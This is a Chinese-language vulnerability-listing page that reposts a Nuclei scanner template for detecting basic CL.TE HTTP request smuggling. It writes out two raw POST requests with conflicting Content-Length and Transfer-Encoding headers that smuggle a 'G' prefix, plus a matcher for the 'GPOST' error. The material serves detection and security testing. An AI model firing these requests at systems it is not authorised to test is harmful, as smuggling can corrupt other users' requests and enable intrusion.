cl-te-http-smuggling: Basic CL.TE - HTTP request smuggling

日期: 2025-11-11 | 影响软件: cl-te-http-smuggling | POC: 已公开

漏洞描述

Detected a potential CL.TE request smuggling condition where conflicting Content-Length and Transfer-Encoding headers caused the gateway and backend to parse requests differently.

PoC代码[已公开]

id: cl-te-http-smuggling

info:
  name: Basic CL.TE - HTTP request smuggling
  author: pdteam,akincibor
  severity: low
  description: |
    Detected a potential CL.TE request smuggling condition where conflicting Content-Length and Transfer-Encoding headers caused the gateway and backend to parse requests differently.
  reference:
    - https://portswigger.net/web-security/request-smuggling/lab-basic-cl-te
  metadata:
    verified: true
    max-request: 2
  tags: cl-te,smuggling

http:
  - raw:
      - |+
        POST / HTTP/1.1
        Host: {{Hostname}}
        Connection: keep-alive
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 6
        Transfer-Encoding: chunked

        0

        G

      - |+
        POST / HTTP/1.1
        Host: {{Hostname}}
        Connection: keep-alive
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 6
        Transfer-Encoding: chunked

        0

        G

    unsafe: true

    matchers:
      - type: dsl
        dsl:
          - 'contains(body_2, "Unrecognized method GPOST")'
# digest: 490a00463044022073f8bfc3708303eb69994eea872499475e24861107f1661fd4d59fa2e4e377b0022002551f2e8288a11d56bf0794bdfb05337053497351bba53e748269202e050c25:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/vulnerabilities/smuggling/cl-te-http-smuggling.yaml